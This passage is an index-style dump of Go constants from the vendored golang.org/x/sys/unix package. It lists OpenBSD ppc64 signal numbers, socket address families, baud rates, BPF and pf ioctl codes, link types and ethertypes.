syscall.Signal(0xb) constant SIGSTOP (line 1746) | SIGSTOP = syscall.Signal(0x11) constant SIGSYS (line 1747) | SIGSYS = syscall.Signal(0xc) constant SIGTERM (line 1748) | SIGTERM = syscall.Signal(0xf) constant SIGTHR (line 1749) | SIGTHR = syscall.Signal(0x20) constant SIGTRAP (line 1750) | SIGTRAP = syscall.Signal(0x5) constant SIGTSTP (line 1751) | SIGTSTP = syscall.Signal(0x12) constant SIGTTIN (line 1752) | SIGTTIN = syscall.Signal(0x15) constant SIGTTOU (line 1753) | SIGTTOU = syscall.Signal(0x16) constant SIGURG (line 1754) | SIGURG = syscall.Signal(0x10) constant SIGUSR1 (line 1755) | SIGUSR1 = syscall.Signal(0x1e) constant SIGUSR2 (line 1756) | SIGUSR2 = syscall.Signal(0x1f) constant SIGVTALRM (line 1757) | SIGVTALRM = syscall.Signal(0x1a) constant SIGWINCH (line 1758) | SIGWINCH = syscall.Signal(0x1c) constant SIGXCPU (line 1759) | SIGXCPU = syscall.Signal(0x18) constant SIGXFSZ (line 1760) | SIGXFSZ = syscall.Signal(0x19) FILE: vendor/golang.org/x/sys/unix/zerrors_openbsd_ppc64.go constant AF_APPLETALK (line 14) | AF_APPLETALK = 0x10 constant AF_BLUETOOTH (line 15) | AF_BLUETOOTH = 0x20 constant AF_CCITT (line 16) | AF_CCITT = 0xa constant AF_CHAOS (line 17) | AF_CHAOS = 0x5 constant AF_CNT (line 18) | AF_CNT = 0x15 constant AF_COIP (line 19) | AF_COIP = 0x14 constant AF_DATAKIT (line 20) | AF_DATAKIT = 0x9 constant AF_DECnet (line 21) | AF_DECnet = 0xc constant AF_DLI (line 22) | AF_DLI = 0xd constant AF_E164 (line 23) | AF_E164 = 0x1a constant AF_ECMA (line 24) | AF_ECMA = 0x8 constant AF_ENCAP (line 25) | AF_ENCAP = 0x1c constant AF_HYLINK (line 26) | AF_HYLINK = 0xf constant AF_IMPLINK (line 27) | AF_IMPLINK = 0x3 constant AF_INET (line 28) | AF_INET = 0x2 constant AF_INET6 (line 29) | AF_INET6 = 0x18 constant AF_IPX (line 30) | AF_IPX = 0x17 constant AF_ISDN (line 31) | AF_ISDN = 0x1a constant AF_ISO (line 32) | AF_ISO = 0x7 constant AF_KEY (line 33) | AF_KEY = 0x1e constant AF_LAT (line 34) | AF_LAT = 0xe constant AF_LINK (line 35) | AF_LINK = 0x12 constant AF_LOCAL (line 36) | AF_LOCAL = 0x1 constant AF_MAX (line 37) | AF_MAX = 0x24 constant AF_MPLS (line 38) | AF_MPLS = 0x21 constant AF_NATM (line 39) | AF_NATM = 0x1b constant AF_NS (line 40) | AF_NS = 0x6 constant AF_OSI (line 41) | AF_OSI = 0x7 constant AF_PUP (line 42) | AF_PUP = 0x4 constant AF_ROUTE (line 43) | AF_ROUTE = 0x11 constant AF_SIP (line 44) | AF_SIP = 0x1d constant AF_SNA (line 45) | AF_SNA = 0xb constant AF_UNIX (line 46) | AF_UNIX = 0x1 constant AF_UNSPEC (line 47) | AF_UNSPEC = 0x0 constant ALTWERASE (line 48) | ALTWERASE = 0x200 constant ARPHRD_ETHER (line 49) | ARPHRD_ETHER = 0x1 constant ARPHRD_FRELAY (line 50) | ARPHRD_FRELAY = 0xf constant ARPHRD_IEEE1394 (line 51) | ARPHRD_IEEE1394 = 0x18 constant ARPHRD_IEEE802 (line 52) | ARPHRD_IEEE802 = 0x6 constant B0 (line 53) | B0 = 0x0 constant B110 (line 54) | B110 = 0x6e constant B115200 (line 55) | B115200 = 0x1c200 constant B1200 (line 56) | B1200 = 0x4b0 constant B134 (line 57) | B134 = 0x86 constant B14400 (line 58) | B14400 = 0x3840 constant B150 (line 59) | B150 = 0x96 constant B1800 (line 60) | B1800 = 0x708 constant B19200 (line 61) | B19200 = 0x4b00 constant B200 (line 62) | B200 = 0xc8 constant B230400 (line 63) | B230400 = 0x38400 constant B2400 (line 64) | B2400 = 0x960 constant B28800 (line 65) | B28800 = 0x7080 constant B300 (line 66) | B300 = 0x12c constant B38400 (line 67) | B38400 = 0x9600 constant B4800 (line 68) | B4800 = 0x12c0 constant B50 (line 69) | B50 = 0x32 constant B57600 (line 70) | B57600 = 0xe100 constant B600 (line 71) | B600 = 0x258 constant B7200 (line 72) | B7200 = 0x1c20 constant B75 (line 73) | B75 = 0x4b constant B76800 (line 74) | B76800 = 0x12c00 constant B9600 (line 75) | B9600 = 0x2580 constant BIOCFLUSH (line 76) | BIOCFLUSH = 0x20004268 constant BIOCGBLEN (line 77) | BIOCGBLEN = 0x40044266 constant BIOCGDIRFILT (line 78) | BIOCGDIRFILT = 0x4004427c constant BIOCGDLT (line 79) | BIOCGDLT = 0x4004426a constant BIOCGDLTLIST (line 80) | BIOCGDLTLIST = 0xc010427b constant BIOCGETIF (line 81) | BIOCGETIF = 0x4020426b constant BIOCGFILDROP (line 82) | BIOCGFILDROP = 0x40044278 constant BIOCGHDRCMPLT (line 83) | BIOCGHDRCMPLT = 0x40044274 constant BIOCGRSIG (line 84) | BIOCGRSIG = 0x40044273 constant BIOCGRTIMEOUT (line 85) | BIOCGRTIMEOUT = 0x4010426e constant BIOCGSTATS (line 86) | BIOCGSTATS = 0x4008426f constant BIOCIMMEDIATE (line 87) | BIOCIMMEDIATE = 0x80044270 constant BIOCLOCK (line 88) | BIOCLOCK = 0x20004276 constant BIOCPROMISC (line 89) | BIOCPROMISC = 0x20004269 constant BIOCSBLEN (line 90) | BIOCSBLEN = 0xc0044266 constant BIOCSDIRFILT (line 91) | BIOCSDIRFILT = 0x8004427d constant BIOCSDLT (line 92) | BIOCSDLT = 0x8004427a constant BIOCSETF (line 93) | BIOCSETF = 0x80104267 constant BIOCSETIF (line 94) | BIOCSETIF = 0x8020426c constant BIOCSETWF (line 95) | BIOCSETWF = 0x80104277 constant BIOCSFILDROP (line 96) | BIOCSFILDROP = 0x80044279 constant BIOCSHDRCMPLT (line 97) | BIOCSHDRCMPLT = 0x80044275 constant BIOCSRSIG (line 98) | BIOCSRSIG = 0x80044272 constant BIOCSRTIMEOUT (line 99) | BIOCSRTIMEOUT = 0x8010426d constant BIOCVERSION (line 100) | BIOCVERSION = 0x40044271 constant BPF_A (line 101) | BPF_A = 0x10 constant BPF_ABS (line 102) | BPF_ABS = 0x20 constant BPF_ADD (line 103) | BPF_ADD = 0x0 constant BPF_ALIGNMENT (line 104) | BPF_ALIGNMENT = 0x4 constant BPF_ALU (line 105) | BPF_ALU = 0x4 constant BPF_AND (line 106) | BPF_AND = 0x50 constant BPF_B (line 107) | BPF_B = 0x10 constant BPF_DIRECTION_IN (line 108) | BPF_DIRECTION_IN = 0x1 constant BPF_DIRECTION_OUT (line 109) | BPF_DIRECTION_OUT = 0x2 constant BPF_DIV (line 110) | BPF_DIV = 0x30 constant BPF_FILDROP_CAPTURE (line 111) | BPF_FILDROP_CAPTURE = 0x1 constant BPF_FILDROP_DROP (line 112) | BPF_FILDROP_DROP = 0x2 constant BPF_FILDROP_PASS (line 113) | BPF_FILDROP_PASS = 0x0 constant BPF_F_DIR_IN (line 114) | BPF_F_DIR_IN = 0x10 constant BPF_F_DIR_MASK (line 115) | BPF_F_DIR_MASK = 0x30 constant BPF_F_DIR_OUT (line 116) | BPF_F_DIR_OUT = 0x20 constant BPF_F_DIR_SHIFT (line 117) | BPF_F_DIR_SHIFT = 0x4 constant BPF_F_FLOWID (line 118) | BPF_F_FLOWID = 0x8 constant BPF_F_PRI_MASK (line 119) | BPF_F_PRI_MASK = 0x7 constant BPF_H (line 120) | BPF_H = 0x8 constant BPF_IMM (line 121) | BPF_IMM = 0x0 constant BPF_IND (line 122) | BPF_IND = 0x40 constant BPF_JA (line 123) | BPF_JA = 0x0 constant BPF_JEQ (line 124) | BPF_JEQ = 0x10 constant BPF_JGE (line 125) | BPF_JGE = 0x30 constant BPF_JGT (line 126) | BPF_JGT = 0x20 constant BPF_JMP (line 127) | BPF_JMP = 0x5 constant BPF_JSET (line 128) | BPF_JSET = 0x40 constant BPF_K (line 129) | BPF_K = 0x0 constant BPF_LD (line 130) | BPF_LD = 0x0 constant BPF_LDX (line 131) | BPF_LDX = 0x1 constant BPF_LEN (line 132) | BPF_LEN = 0x80 constant BPF_LSH (line 133) | BPF_LSH = 0x60 constant BPF_MAJOR_VERSION (line 134) | BPF_MAJOR_VERSION = 0x1 constant BPF_MAXBUFSIZE (line 135) | BPF_MAXBUFSIZE = 0x200000 constant BPF_MAXINSNS (line 136) | BPF_MAXINSNS = 0x200 constant BPF_MEM (line 137) | BPF_MEM = 0x60 constant BPF_MEMWORDS (line 138) | BPF_MEMWORDS = 0x10 constant BPF_MINBUFSIZE (line 139) | BPF_MINBUFSIZE = 0x20 constant BPF_MINOR_VERSION (line 140) | BPF_MINOR_VERSION = 0x1 constant BPF_MISC (line 141) | BPF_MISC = 0x7 constant BPF_MSH (line 142) | BPF_MSH = 0xa0 constant BPF_MUL (line 143) | BPF_MUL = 0x20 constant BPF_NEG (line 144) | BPF_NEG = 0x80 constant BPF_OR (line 145) | BPF_OR = 0x40 constant BPF_RELEASE (line 146) | BPF_RELEASE = 0x30bb6 constant BPF_RET (line 147) | BPF_RET = 0x6 constant BPF_RND (line 148) | BPF_RND = 0xc0 constant BPF_RSH (line 149) | BPF_RSH = 0x70 constant BPF_ST (line 150) | BPF_ST = 0x2 constant BPF_STX (line 151) | BPF_STX = 0x3 constant BPF_SUB (line 152) | BPF_SUB = 0x10 constant BPF_TAX (line 153) | BPF_TAX = 0x0 constant BPF_TXA (line 154) | BPF_TXA = 0x80 constant BPF_W (line 155) | BPF_W = 0x0 constant BPF_X (line 156) | BPF_X = 0x8 constant BRKINT (line 157) | BRKINT = 0x2 constant CFLUSH (line 158) | CFLUSH = 0xf constant CLOCAL (line 159) | CLOCAL = 0x8000 constant CLOCK_BOOTTIME (line 160) | CLOCK_BOOTTIME = 0x6 constant CLOCK_MONOTONIC (line 161) | CLOCK_MONOTONIC = 0x3 constant CLOCK_PROCESS_CPUTIME_ID (line 162) | CLOCK_PROCESS_CPUTIME_ID = 0x2 constant CLOCK_REALTIME (line 163) | CLOCK_REALTIME = 0x0 constant CLOCK_THREAD_CPUTIME_ID (line 164) | CLOCK_THREAD_CPUTIME_ID = 0x4 constant CLOCK_UPTIME (line 165) | CLOCK_UPTIME = 0x5 constant CPUSTATES (line 166) | CPUSTATES = 0x6 constant CP_IDLE (line 167) | CP_IDLE = 0x5 constant CP_INTR (line 168) | CP_INTR = 0x4 constant CP_NICE (line 169) | CP_NICE = 0x1 constant CP_SPIN (line 170) | CP_SPIN = 0x3 constant CP_SYS (line 171) | CP_SYS = 0x2 constant CP_USER (line 172) | CP_USER = 0x0 constant CREAD (line 173) | CREAD = 0x800 constant CRTSCTS (line 174) | CRTSCTS = 0x10000 constant CS5 (line 175) | CS5 = 0x0 constant CS6 (line 176) | CS6 = 0x100 constant CS7 (line 177) | CS7 = 0x200 constant CS8 (line 178) | CS8 = 0x300 constant CSIZE (line 179) | CSIZE = 0x300 constant CSTART (line 180) | CSTART = 0x11 constant CSTATUS (line 181) | CSTATUS = 0xff constant CSTOP (line 182) | CSTOP = 0x13 constant CSTOPB (line 183) | CSTOPB = 0x400 constant CSUSP (line 184) | CSUSP = 0x1a constant CTL_HW (line 185) | CTL_HW = 0x6 constant CTL_KERN (line 186) | CTL_KERN = 0x1 constant CTL_MAXNAME (line 187) | CTL_MAXNAME = 0xc constant CTL_NET (line 188) | CTL_NET = 0x4 constant DIOCADDQUEUE (line 189) | DIOCADDQUEUE = 0xc110445d constant DIOCADDRULE (line 190) | DIOCADDRULE = 0xcd604404 constant DIOCADDSTATE (line 191) | DIOCADDSTATE = 0xc1084425 constant DIOCCHANGERULE (line 192) | DIOCCHANGERULE = 0xcd60441a constant DIOCCLRIFFLAG (line 193) | DIOCCLRIFFLAG = 0xc028445a constant DIOCCLRSRCNODES (line 194) | DIOCCLRSRCNODES = 0x20004455 constant DIOCCLRSTATES (line 195) | DIOCCLRSTATES = 0xc0e04412 constant DIOCCLRSTATUS (line 196) | DIOCCLRSTATUS = 0xc0284416 constant DIOCGETLIMIT (line 197) | DIOCGETLIMIT = 0xc0084427 constant DIOCGETQSTATS (line 198) | DIOCGETQSTATS = 0xc1204460 constant DIOCGETQUEUE (line 199) | DIOCGETQUEUE = 0xc110445f constant DIOCGETQUEUES (line 200) | DIOCGETQUEUES = 0xc110445e constant DIOCGETRULE (line 201) | DIOCGETRULE = 0xcd604407 constant DIOCGETRULES (line 202) | DIOCGETRULES = 0xcd604406 constant DIOCGETRULESET (line 203) | DIOCGETRULESET = 0xc444443b constant DIOCGETRULESETS (line 204) | DIOCGETRULESETS = 0xc444443a constant DIOCGETSRCNODES (line 205) | DIOCGETSRCNODES = 0xc0104454 constant DIOCGETSTATE (line 206) | DIOCGETSTATE = 0xc1084413 constant DIOCGETSTATES (line 207) | DIOCGETSTATES = 0xc0104419 constant DIOCGETSTATUS (line 208) | DIOCGETSTATUS = 0xc1e84415 constant DIOCGETSYNFLWATS (line 209) | DIOCGETSYNFLWATS = 0xc0084463 constant DIOCGETTIMEOUT (line 210) | DIOCGETTIMEOUT = 0xc008441e constant DIOCIGETIFACES (line 211) | DIOCIGETIFACES = 0xc0284457 constant DIOCKILLSRCNODES (line 212) | DIOCKILLSRCNODES = 0xc080445b constant DIOCKILLSTATES (line 213) | DIOCKILLSTATES = 0xc0e04429 constant DIOCNATLOOK (line 214) | DIOCNATLOOK = 0xc0504417 constant DIOCOSFPADD (line 215) | DIOCOSFPADD = 0xc088444f constant DIOCOSFPFLUSH (line 216) | DIOCOSFPFLUSH = 0x2000444e constant DIOCOSFPGET (line 217) | DIOCOSFPGET = 0xc0884450 constant DIOCRADDADDRS (line 218) | DIOCRADDADDRS = 0xc4504443 constant DIOCRADDTABLES (line 219) | DIOCRADDTABLES = 0xc450443d constant DIOCRCLRADDRS (line 220) | DIOCRCLRADDRS = 0xc4504442 constant DIOCRCLRASTATS (line 221) | DIOCRCLRASTATS = 0xc4504448 constant DIOCRCLRTABLES (line 222) | DIOCRCLRTABLES = 0xc450443c constant DIOCRCLRTSTATS (line 223) | DIOCRCLRTSTATS = 0xc4504441 constant DIOCRDELADDRS (line 224) | DIOCRDELADDRS = 0xc4504444 constant DIOCRDELTABLES (line 225) | DIOCRDELTABLES = 0xc450443e constant DIOCRGETADDRS (line 226) | DIOCRGETADDRS = 0xc4504446 constant DIOCRGETASTATS (line 227) | DIOCRGETASTATS = 0xc4504447 constant DIOCRGETTABLES (line 228) | DIOCRGETTABLES = 0xc450443f constant DIOCRGETTSTATS (line 229) | DIOCRGETTSTATS = 0xc4504440 constant DIOCRINADEFINE (line 230) | DIOCRINADEFINE = 0xc450444d constant DIOCRSETADDRS (line 231) | DIOCRSETADDRS = 0xc4504445 constant DIOCRSETTFLAGS (line 232) | DIOCRSETTFLAGS = 0xc450444a constant DIOCRTSTADDRS (line 233) | DIOCRTSTADDRS = 0xc4504449 constant DIOCSETDEBUG (line 234) | DIOCSETDEBUG = 0xc0044418 constant DIOCSETHOSTID (line 235) | DIOCSETHOSTID = 0xc0044456 constant DIOCSETIFFLAG (line 236) | DIOCSETIFFLAG = 0xc0284459 constant DIOCSETLIMIT (line 237) | DIOCSETLIMIT = 0xc0084428 constant DIOCSETREASS (line 238) | DIOCSETREASS = 0xc004445c constant DIOCSETSTATUSIF (line 239) | DIOCSETSTATUSIF = 0xc0284414 constant DIOCSETSYNCOOKIES (line 240) | DIOCSETSYNCOOKIES = 0xc0014462 constant DIOCSETSYNFLWATS (line 241) | DIOCSETSYNFLWATS = 0xc0084461 constant DIOCSETTIMEOUT (line 242) | DIOCSETTIMEOUT = 0xc008441d constant DIOCSTART (line 243) | DIOCSTART = 0x20004401 constant DIOCSTOP (line 244) | DIOCSTOP = 0x20004402 constant DIOCXBEGIN (line 245) | DIOCXBEGIN = 0xc0104451 constant DIOCXCOMMIT (line 246) | DIOCXCOMMIT = 0xc0104452 constant DIOCXROLLBACK (line 247) | DIOCXROLLBACK = 0xc0104453 constant DLT_ARCNET (line 248) | DLT_ARCNET = 0x7 constant DLT_ATM_RFC1483 (line 249) | DLT_ATM_RFC1483 = 0xb constant DLT_AX25 (line 250) | DLT_AX25 = 0x3 constant DLT_CHAOS (line 251) | DLT_CHAOS = 0x5 constant DLT_C_HDLC (line 252) | DLT_C_HDLC = 0x68 constant DLT_EN10MB (line 253) | DLT_EN10MB = 0x1 constant DLT_EN3MB (line 254) | DLT_EN3MB = 0x2 constant DLT_ENC (line 255) | DLT_ENC = 0xd constant DLT_FDDI (line 256) | DLT_FDDI = 0xa constant DLT_IEEE802 (line 257) | DLT_IEEE802 = 0x6 constant DLT_IEEE802_11 (line 258) | DLT_IEEE802_11 = 0x69 constant DLT_IEEE802_11_RADIO (line 259) | DLT_IEEE802_11_RADIO = 0x7f constant DLT_LOOP (line 260) | DLT_LOOP = 0xc constant DLT_MPLS (line 261) | DLT_MPLS = 0xdb constant DLT_NULL (line 262) | DLT_NULL = 0x0 constant DLT_OPENFLOW (line 263) | DLT_OPENFLOW = 0x10b constant DLT_PFLOG (line 264) | DLT_PFLOG = 0x75 constant DLT_PFSYNC (line 265) | DLT_PFSYNC = 0x12 constant DLT_PPP (line 266) | DLT_PPP = 0x9 constant DLT_PPP_BSDOS (line 267) | DLT_PPP_BSDOS = 0x10 constant DLT_PPP_ETHER (line 268) | DLT_PPP_ETHER = 0x33 constant DLT_PPP_SERIAL (line 269) | DLT_PPP_SERIAL = 0x32 constant DLT_PRONET (line 270) | DLT_PRONET = 0x4 constant DLT_RAW (line 271) | DLT_RAW = 0xe constant DLT_SLIP (line 272) | DLT_SLIP = 0x8 constant DLT_SLIP_BSDOS (line 273) | DLT_SLIP_BSDOS = 0xf constant DLT_USBPCAP (line 274) | DLT_USBPCAP = 0xf9 constant DLT_USER0 (line 275) | DLT_USER0 = 0x93 constant DLT_USER1 (line 276) | DLT_USER1 = 0x94 constant DLT_USER10 (line 277) | DLT_USER10 = 0x9d constant DLT_USER11 (line 278) | DLT_USER11 = 0x9e constant DLT_USER12 (line 279) | DLT_USER12 = 0x9f constant DLT_USER13 (line 280) | DLT_USER13 = 0xa0 constant DLT_USER14 (line 281) | DLT_USER14 = 0xa1 constant DLT_USER15 (line 282) | DLT_USER15 = 0xa2 constant DLT_USER2 (line 283) | DLT_USER2 = 0x95 constant DLT_USER3 (line 284) | DLT_USER3 = 0x96 constant DLT_USER4 (line 285) | DLT_USER4 = 0x97 constant DLT_USER5 (line 286) | DLT_USER5 = 0x98 constant DLT_USER6 (line 287) | DLT_USER6 = 0x99 constant DLT_USER7 (line 288) | DLT_USER7 = 0x9a constant DLT_USER8 (line 289) | DLT_USER8 = 0x9b constant DLT_USER9 (line 290) | DLT_USER9 = 0x9c constant DT_BLK (line 291) | DT_BLK = 0x6 constant DT_CHR (line 292) | DT_CHR = 0x2 constant DT_DIR (line 293) | DT_DIR = 0x4 constant DT_FIFO (line 294) | DT_FIFO = 0x1 constant DT_LNK (line 295) | DT_LNK = 0xa constant DT_REG (line 296) | DT_REG = 0x8 constant DT_SOCK (line 297) | DT_SOCK = 0xc constant DT_UNKNOWN (line 298) | DT_UNKNOWN = 0x0 constant ECHO (line 299) | ECHO = 0x8 constant ECHOCTL (line 300) | ECHOCTL = 0x40 constant ECHOE (line 301) | ECHOE = 0x2 constant ECHOK (line 302) | ECHOK = 0x4 constant ECHOKE (line 303) | ECHOKE = 0x1 constant ECHONL (line 304) | ECHONL = 0x10 constant ECHOPRT (line 305) | ECHOPRT = 0x20 constant EMT_TAGOVF (line 306) | EMT_TAGOVF = 0x1 constant EMUL_ENABLED (line 307) | EMUL_ENABLED = 0x1 constant EMUL_NATIVE (line 308) | EMUL_NATIVE = 0x2 constant ENDRUNDISC (line 309) | ENDRUNDISC = 0x9 constant ETH64_8021_RSVD_MASK (line 310) | ETH64_8021_RSVD_MASK = 0xfffffffffff0 constant ETH64_8021_RSVD_PREFIX (line 311) | ETH64_8021_RSVD_PREFIX = 0x180c2000000 constant ETHERMIN (line 312) | ETHERMIN = 0x2e constant ETHERMTU (line 313) | ETHERMTU = 0x5dc constant ETHERTYPE_8023 (line 314) | ETHERTYPE_8023 = 0x4 constant ETHERTYPE_AARP (line 315) | ETHERTYPE_AARP = 0x80f3 constant ETHERTYPE_ACCTON (line 316) | ETHERTYPE_ACCTON = 0x8390 constant ETHERTYPE_AEONIC (line 317) | ETHERTYPE_AEONIC = 0x8036 constant ETHERTYPE_ALPHA (line 318) | ETHERTYPE_ALPHA = 0x814a constant ETHERTYPE_AMBER (line 319) | ETHERTYPE_AMBER = 0x6008 constant ETHERTYPE_AMOEBA (line 320) | ETHERTYPE_AMOEBA = 0x8145 constant ETHERTYPE_AOE (line 321) | ETHERTYPE_AOE = 0x88a2 constant ETHERTYPE_APOLLO (line 322) | ETHERTYPE_APOLLO = 0x80f7 constant ETHERTYPE_APOLLODOMAIN (line 323) | ETHERTYPE_APOLLODOMAIN = 0x8019 constant ETHERTYPE_APPLETALK (line 324) | ETHERTYPE_APPLETALK = 0x809b constant ETHERTYPE_APPLITEK (line 325) | ETHERTYPE_APPLITEK = 0x80c7 constant ETHERTYPE_ARGONAUT (line 326) | ETHERTYPE_ARGONAUT = 0x803a constant ETHERTYPE_ARP (line 327) | ETHERTYPE_ARP = 0x806 constant ETHERTYPE_AT (line 328) | ETHERTYPE_AT = 0x809b constant ETHERTYPE_ATALK (line 329) | ETHERTYPE_ATALK = 0x809b constant ETHERTYPE_ATOMIC (line 330) | ETHERTYPE_ATOMIC = 0x86df constant ETHERTYPE_ATT (line 331) | ETHERTYPE_ATT = 0x8069 constant ETHERTYPE_ATTSTANFORD (line 332) | ETHERTYPE_ATTSTANFORD = 0x8008 constant ETHERTYPE_AUTOPHON (line 333) | ETHERTYPE_AUTOPHON = 0x806a constant ETHERTYPE_AXIS (line 334) | ETHERTYPE_AXIS = 0x8856 constant ETHERTYPE_BCLOOP (line 335) | ETHERTYPE_BCLOOP = 0x9003 constant ETHERTYPE_BOFL (line 336) | ETHERTYPE_BOFL = 0x8102 constant ETHERTYPE_CABLETRON (line 337) | ETHERTYPE_CABLETRON = 0x7034 constant ETHERTYPE_CHAOS (line 338) | ETHERTYPE_CHAOS = 0x804 constant ETHERTYPE_COMDESIGN (line 339) | ETHERTYPE_COMDESIGN = 0x806c constant ETHERTYPE_COMPUGRAPHIC (line 340) | ETHERTYPE_COMPUGRAPHIC = 0x806d constant ETHERTYPE_COUNTERPOINT (line 341) | ETHERTYPE_COUNTERPOINT = 0x8062 constant ETHERTYPE_CRONUS (line 342) | ETHERTYPE_CRONUS = 0x8004 constant ETHERTYPE_CRONUSVLN (line 343) | ETHERTYPE_CRONUSVLN = 0x8003 constant ETHERTYPE_DCA (line 344) | ETHERTYPE_DCA = 0x1234 constant ETHERTYPE_DDE (line 345) | ETHERTYPE_DDE = 0x807b constant ETHERTYPE_DEBNI (line 346) | ETHERTYPE_DEBNI = 0xaaaa constant ETHERTYPE_DECAM (line 347) | ETHERTYPE_DECAM = 0x8048 constant ETHERTYPE_DECCUST (line 348) | ETHERTYPE_DECCUST = 0x6006 constant ETHERTYPE_DECDIAG (line 349) | ETHERTYPE_DECDIAG = 0x6005 constant ETHERTYPE_DECDNS (line 350) | ETHERTYPE_DECDNS = 0x803c constant ETHERTYPE_DECDTS (line 351) | ETHERTYPE_DECDTS = 0x803e constant ETHERTYPE_DECEXPER (line 352) | ETHERTYPE_DECEXPER = 0x6000 constant ETHERTYPE_DECLAST (line 353) | ETHERTYPE_DECLAST = 0x8041 constant ETHERTYPE_DECLTM (line 354) | ETHERTYPE_DECLTM = 0x803f constant ETHERTYPE_DECMUMPS (line 355) | ETHERTYPE_DECMUMPS = 0x6009 constant ETHERTYPE_DECNETBIOS (line 356) | ETHERTYPE_DECNETBIOS = 0x8040 constant ETHERTYPE_DELTACON (line 357) | ETHERTYPE_DELTACON = 0x86de constant ETHERTYPE_DIDDLE (line 358) | ETHERTYPE_DIDDLE = 0x4321 constant ETHERTYPE_DLOG1 (line 359) | ETHERTYPE_DLOG1 = 0x660 constant ETHERTYPE_DLOG2 (line 360) | ETHERTYPE_DLOG2 = 0x661 constant ETHERTYPE_DN (line 361) | ETHERTYPE_DN = 0x6003 constant ETHERTYPE_DOGFIGHT (line 362) | ETHERTYPE_DOGFIGHT = 0x1989 constant ETHERTYPE_DSMD (line 363) | ETHERTYPE_DSMD = 0x8039 constant ETHERTYPE_EAPOL (line 364) | ETHERTYPE_EAPOL = 0x888e constant ETHERTYPE_ECMA (line 365) | ETHERTYPE_ECMA = 0x803 constant ETHERTYPE_ENCRYPT (line 366) | ETHERTYPE_ENCRYPT = 0x803d constant ETHERTYPE_ES (line 367) | ETHERTYPE_ES = 0x805d constant ETHERTYPE_EXCELAN (line 368) | ETHERTYPE_EXCELAN = 0x8010 constant ETHERTYPE_EXPERDATA (line 369) | ETHERTYPE_EXPERDATA = 0x8049 constant ETHERTYPE_FLIP (line 370) | ETHERTYPE_FLIP = 0x8146 constant ETHERTYPE_FLOWCONTROL (line 371) | ETHERTYPE_FLOWCONTROL = 0x8808 constant ETHERTYPE_FRARP (line 372) | ETHERTYPE_FRARP = 0x808 constant ETHERTYPE_GENDYN (line 373) | ETHERTYPE_GENDYN = 0x8068 constant ETHERTYPE_HAYES (line 374) | ETHERTYPE_HAYES = 0x8130 constant ETHERTYPE_HIPPI_FP (line 375) | ETHERTYPE_HIPPI_FP = 0x8180 constant ETHERTYPE_HITACHI (line 376) | ETHERTYPE_HITACHI = 0x8820 constant ETHERTYPE_HP (line 377) | ETHERTYPE_HP = 0x8005 constant ETHERTYPE_IEEEPUP (line 378) | ETHERTYPE_IEEEPUP = 0xa00 constant ETHERTYPE_IEEEPUPAT (line 379) | ETHERTYPE_IEEEPUPAT = 0xa01 constant ETHERTYPE_IMLBL (line 380) | ETHERTYPE_IMLBL = 0x4c42 constant ETHERTYPE_IMLBLDIAG (line 381) | ETHERTYPE_IMLBLDIAG = 0x424c constant ETHERTYPE_IP (line 382) | ETHERTYPE_IP = 0x800 constant ETHERTYPE_IPAS (line 383) | ETHERTYPE_IPAS = 0x876c constant ETHERTYPE_IPV6 (line 384) | ETHERTYPE_IPV6 = 0x86dd constant ETHERTYPE_IPX (line 385) | ETHERTYPE_IPX = 0x8137 constant ETHERTYPE_IPXNEW (line 386) | ETHERTYPE_IPXNEW = 0x8037 constant ETHERTYPE_KALPANA (line 387) | ETHERTYPE_KALPANA = 0x8582 constant ETHERTYPE_LANBRIDGE (line 388) | ETHERTYPE_LANBRIDGE = 0x8038 constant ETHERTYPE_LANPROBE (line 389) | ETHERTYPE_LANPROBE = 0x8888 constant ETHERTYPE_LAT (line 390) | ETHERTYPE_LAT = 0x6004 constant ETHERTYPE_LBACK (line 391) | ETHERTYPE_LBACK = 0x9000 constant ETHERTYPE_LITTLE (line 392) | ETHERTYPE_LITTLE = 0x8060 constant ETHERTYPE_LLDP (line 393) | ETHERTYPE_LLDP = 0x88cc constant ETHERTYPE_LOGICRAFT (line 394) | ETHERTYPE_LOGICRAFT = 0x8148 constant ETHERTYPE_LOOPBACK (line 395) | ETHERTYPE_LOOPBACK = 0x9000 constant ETHERTYPE_MACSEC (line 396) | ETHERTYPE_MACSEC = 0x88e5 constant ETHERTYPE_MATRA (line 397) | ETHERTYPE_MATRA = 0x807a constant ETHERTYPE_MAX (line 398) | ETHERTYPE_MAX = 0xffff constant ETHERTYPE_MERIT (line 399) | ETHERTYPE_MERIT = 0x807c constant ETHERTYPE_MICP (line 400) | ETHERTYPE_MICP = 0x873a constant ETHERTYPE_MOPDL (line 401) | ETHERTYPE_MOPDL = 0x6001 constant ETHERTYPE_MOPRC (line 402) | ETHERTYPE_MOPRC = 0x6002 constant ETHERTYPE_MOTOROLA (line 403) | ETHERTYPE_MOTOROLA = 0x818d constant ETHERTYPE_MPLS (line 404) | ETHERTYPE_MPLS = 0x8847 constant ETHERTYPE_MPLS_MCAST (line 405) | ETHERTYPE_MPLS_MCAST = 0x8848 constant ETHERTYPE_MUMPS (line 406) | ETHERTYPE_MUMPS = 0x813f constant ETHERTYPE_NBPCC (line 407) | ETHERTYPE_NBPCC = 0x3c04 constant ETHERTYPE_NBPCLAIM (line 408) | ETHERTYPE_NBPCLAIM = 0x3c09 constant ETHERTYPE_NBPCLREQ (line 409) | ETHERTYPE_NBPCLREQ = 0x3c05 constant ETHERTYPE_NBPCLRSP (line 410) | ETHERTYPE_NBPCLRSP = 0x3c06 constant ETHERTYPE_NBPCREQ (line 411) | ETHERTYPE_NBPCREQ = 0x3c02 constant ETHERTYPE_NBPCRSP (line 412) | ETHERTYPE_NBPCRSP = 0x3c03 constant ETHERTYPE_NBPDG (line 413) | ETHERTYPE_NBPDG = 0x3c07 constant ETHERTYPE_NBPDGB (line 414) | ETHERTYPE_NBPDGB = 0x3c08 constant ETHERTYPE_NBPDLTE (line 415) | ETHERTYPE_NBPDLTE = 0x3c0a constant ETHERTYPE_NBPRAR (line 416) | ETHERTYPE_NBPRAR = 0x3c0c constant ETHERTYPE_NBPRAS (line 417) | ETHERTYPE_NBPRAS = 0x3c0b constant ETHERTYPE_NBPRST (line 418) | ETHERTYPE_NBPRST = 0x3c0d constant ETHERTYPE_NBPSCD (line 419) | ETHERTYPE_NBPSCD = 0x3c01 constant ETHERTYPE_NBPVCD (line 420) | ETHERTYPE_NBPVCD = 0x3c00 constant ETHERTYPE_NBS (line 421) | ETHERTYPE_NBS = 0x802 constant ETHERTYPE_NCD (line 422) | ETHERTYPE_NCD = 0x8149 constant ETHERTYPE_NESTAR (line 423) | ETHERTYPE_NESTAR = 0x8006 constant 